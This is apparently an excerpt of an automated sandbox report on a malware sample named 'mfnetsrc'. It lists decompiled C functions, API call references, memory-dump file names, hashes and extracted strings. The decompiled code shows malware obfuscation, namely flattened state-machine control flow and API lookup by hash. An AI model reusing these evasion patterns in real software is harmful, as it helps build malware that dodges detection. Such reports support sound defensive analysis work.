0x02aa5531
0x02aa5531
0x02aa553c

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02AA5531

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: eda65dd1bb00c968ea366c48354580fe5acdd767db11c47d079ead84afbf5197
Instruction ID: 42a3fcaeaf3bd2a71c16c4117989857d8ec62205d2a54318eff9ddbf033f5fbe
Opcode Fuzzy Hash: eda65dd1bb00c968ea366c48354580fe5acdd767db11c47d079ead84afbf5197
Instruction Fuzzy Hash: 73113070E40301ABE724EBA4D9A1B76B7E2AF90704F84881CE5458B1C0EFB4D949CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02AA6F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02AA6F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E02AA34C0(__ecx);
				if( *0x2aaddc4 == 0) {
					 *0x2aaddc4 = E02AA3E80(__ebx, E02AA3F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x2aae2e8; // 0xde36b0
				 *(_t17 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x2aadea8;
				if(_t7 == 0) {
					_t7 = E02AA3E80(_t15, E02AA3F20(0xbb398380), 0x97f883e, _t31);
					 *0x2aadea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x2aae1a0;
				if(_t9 == 0) {
					_t9 = E02AA3E80(_t15, E02AA3F20(0xbb398380), 0x26c3f343, _t31);
					 *0x2aae1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x02aa6f10
0x02aa6f12
0x02aa6f19
0x02aa6f22
0x02aa6f3a
0x02aa6f3a
0x02aa6f40
0x02aa6f42
0x02aa6f48
0x02aa6f4c
0x02aa6f53
0x02aa6f66
0x02aa6f6b
0x02aa6f6b
0x02aa6f72
0x02aa6f74
0x02aa6f7b
0x02aa6f8e
0x02aa6f93
0x02aa6f93
0x02aa6fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,02AA704F,02AA68DC), ref: 02AA6F40

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e033ca50ed3597784fdf9ed2cfc076b28fdf37a3506786526d42bf34f9acadb7
Instruction ID: fe2ce2dc4a25e857d2bacb0f305c3a311bcbacf7be7decc018c780cbfaab3e66
Opcode Fuzzy Hash: e033ca50ed3597784fdf9ed2cfc076b28fdf37a3506786526d42bf34f9acadb7
Instruction Fuzzy Hash: CC014F35B81212AF9F24BBB5A5B066F66EB9FC0794704486AF055CB344EF30DC124F91

Uniqueness

Uniqueness Score: -1.00%

Function 02A327B0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 02A327D9

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 08d04ae3ae76f0a75112d6b3437849c04b569e2d82c9fd1b76b42bbd3b7fc9d5
Instruction ID: 64ce207327aaae57f612cb56195269ba4896711ea5bcf1e3a52f25370c6dce6f
Opcode Fuzzy Hash: 08d04ae3ae76f0a75112d6b3437849c04b569e2d82c9fd1b76b42bbd3b7fc9d5
Instruction Fuzzy Hash: 68D05EB4D80208BFDB00EFA4EA0AA5CBBB4EB05302F008064F905A7240EB706A048F92

Uniqueness

Uniqueness Score: -1.00%

Function 02A31820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02A3182F

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 1a821b445446be13d3ec8330cdcc86680b2d5d1edcf9cac072a61ffb9a2f0e86
Instruction ID: 7a19f31a7e365ab12e95626fcd2de13615da41db21b7ebc4f4be4d166280f237
Opcode Fuzzy Hash: 1a821b445446be13d3ec8330cdcc86680b2d5d1edcf9cac072a61ffb9a2f0e86
Instruction Fuzzy Hash: DEC04C7A55420CAB8B04DF98EC84DAB77ADBB8C710B048548BA1D87200CA34F9118BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AA1FB0, Relevance: 4.0, Strings: 3, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02AA1FB0(intOrPtr* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t26;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t40;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t54;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr _t60;
				intOrPtr _t66;
				intOrPtr* _t85;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				void* _t99;

				_t58 = __ecx;
				_t88 =  *((intOrPtr*)(_t96 + 0x1c));
				_t95 = __edx;
				 *((intOrPtr*)(_t96 + 0x10)) = __ecx;
				_t57 = 0;
				_t26 = 0x1e37d88e;
				while(1) {
					L1:
					_t91 =  *((intOrPtr*)(_t96 + 0x18));
					goto L2;
					do {
						while(1) {
							L2:
							_t98 = _t26 - 0x27643e76;
							if(_t98 > 0) {
								break;
							}
							if(_t98 == 0) {
								_t26 = 0x1f9931a7;
								continue;
							} else {
								_t99 = _t26 - 0x1f9931a7;
								if(_t99 > 0) {
									__eflags = _t26 - 0x234da148;
									if(_t26 == 0x234da148) {
										__eflags = _t57;
										if(_t57 == 0) {
											E02AA4250(_t57,  *_t95);
										}
										goto L44;
									} else {
										__eflags = _t26 - 0x23930c9c;
										if(_t26 != 0x23930c9c) {
											goto L40;
										} else {
											_t44 =  *0x2aae120; // 0x0
											__eflags = _t44;
											if(_t44 == 0) {
												_t44 = E02AA3E80(_t57, E02AA3F20(0x667fdee), 0x207605dd, _t95);
												 *0x2aae120 = _t44;
											}
											_t60 =  *0x2aae2e4; // 0xdf3588
											_t45 =  *_t44( *((intOrPtr*)(_t96 + 0x28)), _t91, 0x60,  *((intOrPtr*)(_t60 + 0x1c)), 0, 0);
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											__eflags = _t45;
											_t26 = 0x3134f996;
											_t57 =  !=  ? 1 : _t57;
											continue;
										}
									}
								} else {
									if(_t99 == 0) {
										_t47 =  *0x2aadea8;
										_t93 =  *((intOrPtr*)(_t58 + 4)) + 0xffffff8c;
										 *((intOrPtr*)(_t95 + 4)) = _t93;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E02AA3E80(_t57, E02AA3F20(0xbb398380), 0x97f883e, _t95);
											 *0x2aadea8 = _t47;
										}
										_t89 =  *_t47();
										_t49 =  *0x2aadcec;
										__eflags = _t49;
										if(_t49 == 0) {
											_t49 = E02AA3E80(_t57, E02AA3F20(0xbb398380), 0xe9233692, _t95);
											 *0x2aadcec = _t49;
										}
										_t50 =  *_t49(_t89, 8, _t93);
										 *_t95 = _t50;
										__eflags = _t50;
										if(_t50 == 0) {
											L44:
											return _t57;
										} else {
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											_t91 =  *_t58;
											 *((intOrPtr*)(_t96 + 0x18)) = _t91;
											_t88 =  *((intOrPtr*)(_t58 + 4)) - 0x74;
											 *((intOrPtr*)(_t96 + 0x1c)) = _t91 + 0x74;
											_t26 = 0x3ac56b1d;
											continue;
										}
									} else {
										if(_t26 == 0x72b6082) {
											_t54 =  *0x2aadaac;
											_t94 =  *_t95;
											__eflags = _t54;
											if(_t54 == 0) {
												_t54 = E02AA3E80(_t57, E02AA3F20(0xe66945e6), 0x70f7b8ec, _t95);
												 *0x2aadaac = _t54;
											}
											 *_t54(_t94,  *((intOrPtr*)(_t96 + 0x20)), _t88);
											_t58 =  *((intOrPtr*)(_t96 + 0x1c));
											_t96 = _t96 + 0xc;
											_t26 = 0x3126cae3;
											goto L1;
										} else {
											if(_t26 != 0x1e37d88e) {
												goto L40;
											} else {
												_t26 = 0x323ed498;
												continue;
											}
										}
									}
								}
							}
							L45:
						}
						__eflags = _t26 - 0x323ed498;
						if(__eflags > 0) {
							__eflags = _t26 - 0x3ac56b1d;
							if(_t26 != 0x3ac56b1d) {
								goto L40;
							} else {
								_t28 =  *0x2aadef8;
								__eflags = _t28;
								if(_t28 == 0) {
									_t28 = E02AA3E80(_t57, E02AA3F20(0x667fdee), 0xb11f83b0, _t95);
									 *0x2aadef8 = _t28;
								}
								_t66 =  *0x2aae2e4; // 0xdf3588
								_t29 =  *_t28( *((intOrPtr*)(_t66 + 0x18)), 0, 0, _t96 + 0x14);
								_t58 =  *((intOrPtr*)(_t96 + 0x10));
								asm("sbb eax, eax");
								_t26 = ( ~_t29 & 0xe3ddbf3a) + 0x234da148;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								__eflags =  *((intOrPtr*)(_t58 + 4)) - 0x74;
								if( *((intOrPtr*)(_t58 + 4)) < 0x74) {
									goto L44;
								} else {
									_t26 = 0x27643e76;
									goto L2;
								}
							} else {
								__eflags = _t26 - 0x3126cae3;
								if(_t26 == 0x3126cae3) {
									_t85 =  *0x2aadf8c; // 0x0
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E02AA3E80(_t57, E02AA3F20(0x667fdee), 0x47a72724, _t95);
										 *0x2aadf8c = _t85;
									}
									_t34 =  *0x2aae2e4; // 0xdf3588
									_t35 =  *_t85( *((intOrPtr*)(_t34 + 0x20)),  *((intOrPtr*)(_t96 + 0x24)), 1, 0,  *_t95, _t95 + 4);
									_t58 =  *((intOrPtr*)(_t96 + 0x10));
									asm("sbb eax, eax");
									_t26 = ( ~_t35 & 0xf25e1306) + 0x3134f996;
									goto L2;
								} else {
									__eflags = _t26 - 0x3134f996;
									if(_t26 != 0x3134f996) {
										goto L40;
									} else {
										_t40 =  *0x2aae168;
										__eflags = _t40;
										if(_t40 == 0) {
											_t40 = E02AA3E80(_t57, E02AA3F20(0x667fdee), 0xae646c41, _t95);
											 *0x2aae168 = _t40;
										}
										 *_t40( *((intOrPtr*)(_t96 + 0x14)));
										_t58 =  *((intOrPtr*)(_t96 + 0x10));
										_t26 = 0x234da148;
										goto L2;
									}
								}
							}
						}
						goto L45;
						L40:
						__eflags = _t26 - 0x6df8497;
					} while (_t26 != 0x6df8497);
					return _t57;
					goto L45;
				}
			}

0x02aa1fb0
0x02aa1fb7
0x02aa1fbb
0x02aa1fbd
0x02aa1fc1
0x02aa1fc3
0x02aa1fc8
0x02aa1fc8
0x02aa1fc8
0x02aa1fc8
0x02aa1fd0
0x02aa1fd0
0x02aa1fd0
0x02aa1fd0
0x02aa1fd5
0x00000000
0x00000000
0x02aa1fdb
0x02aa2133
0x00000000
0x02aa1fe1
0x02aa1fe1
0x02aa1fe6
0x02aa20cb
0x02aa20d0
0x02aa226f
0x02aa2271
0x02aa2276
0x02aa2276
0x00000000
0x02aa20d6
0x02aa20d6
0x02aa20db
0x00000000
0x02aa20e1
0x02aa20e1
0x02aa20e6
0x02aa20e8
0x02aa20fb
0x02aa2100
0x02aa2100
0x02aa2105
0x02aa2119
0x02aa211b
0x02aa211f
0x02aa2126
0x02aa212b
0x00000000
0x02aa212b
0x02aa20db
0x02aa1fec
0x02aa1fec
0x02aa2047
0x02aa204c
0x02aa204f
0x02aa2052
0x02aa2054
0x02aa2067
0x02aa206c
0x02aa206c
0x02aa2073
0x02aa2075
0x02aa207a
0x02aa207c
0x02aa208f
0x02aa2094
0x02aa2094
0x02aa209d
0x02aa209f
0x02aa20a2
0x02aa20a4
0x02aa227e
0x02aa2284
0x02aa20aa
0x02aa20aa
0x02aa20ae
0x02aa20b3
0x02aa20b7
0x02aa20bd
0x02aa20c1
0x00000000
0x02aa20c1
0x02aa1fee
0x02aa1ff3
0x02aa2007
0x02aa200c
0x02aa200f
0x02aa2011
0x02aa2024
0x02aa2029
0x02aa2029
0x02aa2034
0x02aa2036
0x02aa203a
0x02aa203d
0x00000000
0x02aa1ff5
0x02aa1ffa
0x00000000
0x02aa2000
0x02aa2000
0x00000000
0x02aa2000
0x02aa1ffa
0x02aa1ff3
0x02aa1fec
0x02aa1fe6
0x00000000
0x02aa1fdb
0x02aa213d
0x02aa2142
0x02aa2204
0x02aa2209
0x00000000
0x02aa220b
0x02aa220b
0x02aa2210
0x02aa2212
0x02aa2225
0x02aa222a
0x02aa222a
0x02aa2234
0x02aa2241
0x02aa2243
0x02aa2249
0x02aa2250
0x00000000
0x02aa2250
0x02aa2148
0x02aa2148
0x02aa21f0
0x02aa21f4
0x00000000
0x02aa21fa
0x02aa21fa
0x00000000
0x02aa21fa
0x02aa214e
0x02aa214e
0x02aa2153
0x02aa2198
0x02aa219e
0x02aa21a0
0x02aa21b8
0x02aa21ba
0x02aa21ba
0x02aa21c0
0x02aa21d7
0x02aa21d9
0x02aa21df
0x02aa21e6
0x00000000
0x02aa2155
0x02aa2155
0x02aa215a
0x00000000
0x02aa2160
0x02aa2160
0x02aa2165
0x02aa2167
0x02aa217a
0x02aa217f
0x02aa217f
0x02aa2188
0x02aa218a
0x02aa218e
0x00000000
0x02aa218e
0x02aa215a
0x02aa2153
0x02aa2148
0x00000000
0x02aa225a
0x02aa225a
0x02aa225a
0x02aa226e
0x00000000
0x02aa226e

Strings

v>d', xrefs: 02AA21FA
v>d', xrefs: 02AA1FD0
Ei, xrefs: 02AA2013

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID:
String ID: v>d'$v>d'$Ei
API String ID: 0-262821485
Opcode ID: 374d4c8c47d668c3a2c9c2285db4e3e794832ccf745f1c3b8de887c99462f912
Instruction ID: d6a022dfb8ae6b2aee0875103cc5e08462ccc22a5f63e31d053c6cb9265f9471
Opcode Fuzzy Hash: 374d4c8c47d668c3a2c9c2285db4e3e794832ccf745f1c3b8de887c99462f912
Instruction Fuzzy Hash: 5161B775B44202ABCB24DF6599A073EB7A6AF84344F14886BE946CB354DF30DC16CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9FA0, Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02AA9FA0(char* __ecx, intOrPtr __edx) {
				char _v524;
				char _v1044;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				intOrPtr* _v1068;
				intOrPtr _v1072;
				char* _v1076;
				intOrPtr _v1080;
				intOrPtr* _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1108;
				intOrPtr _v1112;
				void* __ebx;
				void* __ebp;
				void* _t39;
				signed int _t40;
				intOrPtr* _t43;
				signed int _t46;
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr* _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr* _t97;
				intOrPtr _t98;
				char* _t99;
				intOrPtr _t100;
				intOrPtr _t134;
				intOrPtr* _t144;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				char* _t152;
				void* _t153;
				char _t155;
				intOrPtr _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t99 = __ecx;
				_t157 =  &_v1084;
				_v1080 = __edx;
				_v1076 = __ecx;
				_t39 = 0x1a29c84b;
				while(1) {
					L1:
					_t97 = _v1068;
					while(1) {
						_t155 = _v1064;
						do {
							while(1) {
								L3:
								_t158 = _t39 - 0x1bec2acf;
								if(_t158 > 0) {
									break;
								}
								if(_t158 == 0) {
									_t56 =  *0x2aadea8;
									__eflags = _t56;
									if(_t56 == 0) {
										_t99 = E02AA3F20(0xbb398380);
										_t56 = E02AA3E80(_t97, _t99, 0x97f883e, _t155);
										 *0x2aadea8 = _t56;
									}
									_t146 =  *_t56();
									_t58 =  *0x2aae1a0;
									__eflags = _t58;
									if(_t58 == 0) {
										_t99 = E02AA3F20(0xbb398380);
										_t58 = E02AA3E80(_t97, _t99, 0x26c3f343, _t155);
										 *0x2aae1a0 = _t58;
									}
									 *_t58(_t146, 0, _t97);
									_t147 = _v1088;
									_t39 = 0x1dedf83c;
									continue;
								} else {
									_t159 = _t39 - 0x191840a9;
									if(_t159 > 0) {
										__eflags = _t39 - 0x1a29c84b;
										if(_t39 == 0x1a29c84b) {
											_t62 =  *0x2aadea8;
											__eflags = _t62;
											if(_t62 == 0) {
												_t99 = E02AA3F20(0xbb398380);
												_t62 = E02AA3E80(_t97, _t99, 0x97f883e, _t155);
												 *0x2aadea8 = _t62;
											}
											_t148 =  *_t62();
											_t64 =  *0x2aadcec;
											__eflags = _t64;
											if(_t64 == 0) {
												_t99 = E02AA3F20(0xbb398380);
												_t64 = E02AA3E80(_t97, _t99, 0xe9233692, _t155);
												 *0x2aadcec = _t64;
											}
											_t65 =  *_t64(_t148, 8, 0x48);
											_v1084 = _t65;
											__eflags = _t65;
											if(_t65 == 0) {
												return _t65;
											} else {
												_t147 = _v1088;
												_t39 = 0x1fc710ef;
												continue;
											}
										} else {
											__eflags = _t39 - 0x1a44b2a5;
											if(_t39 != 0x1a44b2a5) {
												goto L45;
											} else {
												_t152 = E02AA34C0(0x2aada50);
												_t69 =  *0x2aadc60;
												__eflags = _t69;
												if(_t69 == 0) {
													_t69 = E02AA3E80(_t97, E02AA3F20(0xe66945e6), 0xcca28b0d, _t155);
													 *0x2aadc60 = _t69;
												}
												 *_t69( &_v1044, 0x104, _t152,  &_v524, _t97);
												_t157 = _t157 + 0x14;
												_t99 = _t152;
												E02AA3460(_t99);
												_t147 = _v1076;
												_t39 = 0x10f8a433;
												continue;
											}
										}
									} else {
										if(_t159 == 0) {
											_t100 = _v1072;
											 *((intOrPtr*)(_t100 + 0x24)) = _t147;
											_t73 =  *0x2aae2dc; // 0x0
											 *((intOrPtr*)(_t100 + 0x20)) = _t73;
											 *0x2aae2dc = _t100;
											return _t73;
										} else {
											if(_t39 == 0xa70e03e) {
												_t74 =  *0x2aadc70;
												__eflags = _t74;
												if(_t74 == 0) {
													_t99 = E02AA3F20(0xbb398380);
													_t74 = E02AA3E80(_t97, _t99, 0x560d239b, _t155);
													 *0x2aadc70 = _t74;
												}
												 *_t74(_v1056);
												_t39 = 0x191840a9;
												continue;
											} else {
												if(_t39 == 0x10f8a433) {
													_push(0);
													_push(_t99);
													_t99 = 0;
													E02AA4BA0(_t97, 0,  &_v1044, _t155, 1);
													_t157 = _t157 + 0xc;
													_t39 = 0x1bec2acf;
													continue;
												} else {
													if(_t39 != 0x18d473c5) {
														goto L45;
													} else {
														_t149 =  *0x2aae2ec; // 0xdf7b30
														_t78 =  *0x2aae024;
														_t150 = _t149 + 0x278;
														_v1052 = _t150;
														if(_t78 == 0) {
															_t99 = E02AA3F20(0xbb398380);
															_t78 = E02AA3E80(_t97, _t99, 0x5262aefc, _t155);
															 *0x2aae024 = _t78;
														}
														_t79 =  *_t78(_t150);
														_t151 =  *0x2aaded0;
														_v1052 = 2 + _t79 * 2;
														if(_t151 == 0) {
															_t99 = E02AA3F20(0xbb398380);
															_t151 = E02AA3E80(_t97, _t99, 0x23563937, _t155);
															 *0x2aaded0 = _t151;
														}
														_t156 = _t151;
														if(_t151 == 0) {
															_t99 = E02AA3F20(0xbb398380);
															_t151 = E02AA3E80(_t97, _t99, 0x23563937, _t156);
															 *0x2aaded0 = _t151;
														}
														_t98 = _t151;
														if(_t151 == 0) {
															_t99 = E02AA3F20(0xbb398380);
															 *0x2aaded0 = E02AA3E80(_t98, _t99, 0x23563937, _t156);
														}
														_t144 =  *0x2aadce8; // 0x0
														if(_t144 == 0) {
															_t99 = E02AA3F20(0xbb398380);
															_t144 = E02AA3E80(_t98, _t99, 0xb310a228, _t156);
															 *0x2aadce8 = _t144;
														}
														_t85 =  *_t144(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_v1060, 0x100000, 1, 0);
														_t147 = _v1108;
														_t134 = _v1112;
														asm("sbb eax, eax");
														_t39 = ( ~_t85 & 0x069deb97) + 0x1f9eb481;
														goto L1;
													}
												}
											}
										}
									}
								}
								L60:
							}
							__eflags = _t39 - 0x1fc710ef;
							if(__eflags > 0) {
								__eflags = _t39 - 0x263ca018;
								if(_t39 == 0x263ca018) {
									_t99 =  &_v1056;
									_t40 = E02AAB3A0(_t99,  &_v1064);
									asm("sbb eax, eax");
									_t39 = ( ~_t40 & 0x28f9ad68) + 0xa70e03e;
									_t155 = _v1064;
									goto L3;
								} else {
									__eflags = _t39 - 0x336a8da6;
									if(_t39 != 0x336a8da6) {
										goto L45;
									} else {
										_t99 = _t155;
										_t43 = E02AA1140(_v1060);
										_t134 = _v1080;
										_t97 = _t43;
										__eflags = _t97;
										_v1068 = _t97;
										_t39 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
										goto L3;
									}
								}
							} else {
								if(__eflags == 0) {
									_t99 = _t147;
									_t46 = E02AAAB50(_t99, _t134,  &_v524);
									_t134 = _v1080;
									_t157 = _t157 + 4;
									asm("sbb eax, eax");
									_t39 = ( ~_t46 & 0xf935bf44) + 0x1f9eb481;
									goto L3;
								} else {
									__eflags = _t39 - 0x1dedf83c;
									if(_t39 == 0x1dedf83c) {
										_t49 =  *0x2aadea8;
										__eflags = _t49;
										if(_t49 == 0) {
											_t99 = E02AA3F20(0xbb398380);
											_t49 = E02AA3E80(_t97, _t99, 0x97f883e, _t155);
											 *0x2aadea8 = _t49;
										}
										_t153 =  *_t49();
										_t51 =  *0x2aae1a0;
										__eflags = _t51;
										if(_t51 == 0) {
											_t99 = E02AA3F20(0xbb398380);
											_t51 = E02AA3E80(_t97, _t99, 0x26c3f343, _t155);
											 *0x2aae1a0 = _t51;
										}
										 *_t51(_t153, 0, _t155);
										_t147 = _v1088;
										_t39 = 0xa70e03e;
										_t134 = _v1092;
										goto L3;
									} else {
										__eflags = _t39 - 0x1f9eb481;
										if(_t39 == 0x1f9eb481) {
											return E02AA4250(_t97, _v1072);
										}
										goto L45;
									}
								}
							}
							goto L60;
							L45:
							__eflags = _t39 - 0x1c40b504;
						} while (_t39 != 0x1c40b504);
						return _t39;
						goto L60;
					}
				}
			}

0x02aa9fa0
0x02aa9fa0
0x02aa9fab
0x02aa9fb0
0x02aa9fb4
0x02aa9fb9
0x02aa9fb9
0x02aa9fb9
0x02aa9fc2
0x02aa9fc2
0x02aa9fd0
0x02aa9fd0
0x02aa9fd0
0x02aa9fd0
0x02aa9fd5
0x00000000
0x00000000
0x02aa9fdb
0x02aaa25f
0x02aaa264
0x02aaa266
0x02aaa277
0x02aaa279
0x02aaa27e
0x02aaa27e
0x02aaa285
0x02aaa287
0x02aaa28c
0x02aaa28e
0x02aaa29f
0x02aaa2a1
0x02aaa2a6
0x02aaa2a6
0x02aaa2af
0x02aaa2b1
0x02aaa2b5
0x00000000
0x02aa9fe1
0x02aa9fe1
0x02aa9fe6
0x02aaa17a
0x02aaa17f
0x02aaa1ee
0x02aaa1f3
0x02aaa1f5
0x02aaa206
0x02aaa208
0x02aaa20d
0x02aaa20d
0x02aaa214
0x02aaa216
0x02aaa21b
0x02aaa21d
0x02aaa22e
0x02aaa230
0x02aaa235
0x02aaa235
0x02aaa23f
0x02aaa241
0x02aaa245
0x02aaa247
0x02aaa416
0x02aaa24d
0x02aaa24d
0x02aaa251
0x00000000
0x02aaa256
0x02aaa181
0x02aaa181
0x02aaa186
0x00000000
0x02aaa18c
0x02aaa196
0x02aaa198
0x02aaa19d
0x02aaa19f
0x02aaa1b2
0x02aaa1b7
0x02aaa1b7
0x02aaa1d0
0x02aaa1d2
0x02aaa1d5
0x02aaa1d7
0x02aaa1dc
0x02aaa1e0
0x00000000
0x02aaa1e5
0x02aaa186
0x02aa9fec
0x02aa9fec
0x02aaa3e3
0x02aaa3e7
0x02aaa3ea
0x02aaa3ef
0x02aaa3f2
0x02aaa402
0x02aa9ff2
0x02aa9ff7
0x02aaa142
0x02aaa147
0x02aaa149
0x02aaa15a
0x02aaa15c
0x02aaa161
0x02aaa161
0x02aaa16a
0x02aaa170
0x00000000
0x02aa9ffd
0x02aaa002
0x02aaa121
0x02aaa123
0x02aaa12a
0x02aaa12c
0x02aaa135
0x02aaa138
0x00000000
0x02aaa008
0x02aaa00d
0x00000000
0x02aaa013
0x02aaa013
0x02aaa019
0x02aaa01e
0x02aaa024
0x02aaa02a
0x02aaa03b
0x02aaa03d
0x02aaa042
0x02aaa042
0x02aaa048
0x02aaa04a
0x02aaa057
0x02aaa05d
0x02aaa06e
0x02aaa075
0x02aaa077
0x02aaa077
0x02aaa07d
0x02aaa081
0x02aaa092
0x02aaa099
0x02aaa09b
0x02aaa09b
0x02aaa0a1
0x02aaa0a5
0x02aaa0b6
0x02aaa0bf
0x02aaa0bf
0x02aaa0c5
0x02aaa0cd
0x02aaa0de
0x02aaa0e5
0x02aaa0e7
0x02aaa0e7
0x02aaa104
0x02aaa106
0x02aaa10c
0x02aaa110
0x02aaa117
0x00000000
0x02aaa117
0x02aaa00d
0x02aaa002
0x02aa9ff7
0x02aa9fec
0x02aa9fe6
0x00000000
0x02aa9fdb
0x02aaa2c3
0x02aaa2c8
0x02aaa389
0x02aaa38e
0x02aaa3c3
0x02aaa3c7
0x02aaa3d2
0x02aaa3d9
0x02aa9fc2
0x00000000
0x02aaa390
0x02aaa390
0x02aaa395
0x00000000
0x02aaa39b
0x02aaa39f
0x02aaa3a1
0x02aaa3a6
0x02aaa3aa
0x02aaa3ac
0x02aaa3ae
0x02aaa3b7
0x00000000
0x02aaa3b7
0x02aaa395
0x02aaa2ce
0x02aaa2ce
0x02aaa367
0x02aaa36a
0x02aaa36f
0x02aaa373
0x02aaa378
0x02aaa37f
0x00000000
0x02aaa2d4
0x02aaa2d4
0x02aaa2d9
0x02aaa2fc
0x02aaa301
0x02aaa303
0x02aaa314
0x02aaa316
0x02aaa31b
0x02aaa31b
0x02aaa322
0x02aaa324
0x02aaa329
0x02aaa32b
0x02aaa33c
0x02aaa33e
0x02aaa343
0x02aaa343
0x02aaa34c
0x02aaa34e
0x02aaa352
0x02aaa357
0x00000000
0x02aaa2db
0x02aaa2db
0x02aaa2e0
0x00000000
0x02aaa407
0x00000000
0x02aaa2e0
0x02aaa2d9
0x02aaa2ce
0x00000000
0x02aaa2e6
0x02aaa2e6
0x02aaa2e6
0x02aaa2fb
0x00000000
0x02aaa2fb
0x02aa9fc2

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 02AAA0FB
GetCurrentProcess.KERNEL32(00000000), ref: 02AAA0FE
GetCurrentProcess.KERNEL32(00000000), ref: 02AAA101

Strings

79V#, xrefs: 02AAA08D
>p, xrefs: 02AA9FF2
>p, xrefs: 02AAA352
Ei, xrefs: 02AAA1A1
79V#, xrefs: 02AAA0B1
79V#, xrefs: 02AAA069

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

